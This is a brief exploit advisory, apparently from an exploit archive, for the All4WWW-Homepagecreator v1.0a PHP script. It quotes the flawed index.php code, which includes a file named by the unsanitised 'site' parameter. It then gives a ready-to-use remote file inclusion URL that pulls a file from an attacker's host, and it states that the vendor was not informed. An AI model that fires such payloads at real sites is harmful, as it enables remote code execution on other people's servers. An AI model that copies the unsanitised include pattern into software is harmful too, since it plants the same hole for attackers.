################################################ # # Script: All4WWW-Homepagecreator # Version: v1.0a # Vendor: http://www.All4WWW.com # ################################################ I. Bug Code On index.php ... if(!$site) {$site="home";} include "$site.dat"; ... II. Exploit [vuln-host]/index.php?site=http://[host]/some-file PS.: The vendor wasn't inform. ############################################ # by Dominus_Vis # [Infektion Group] ############################################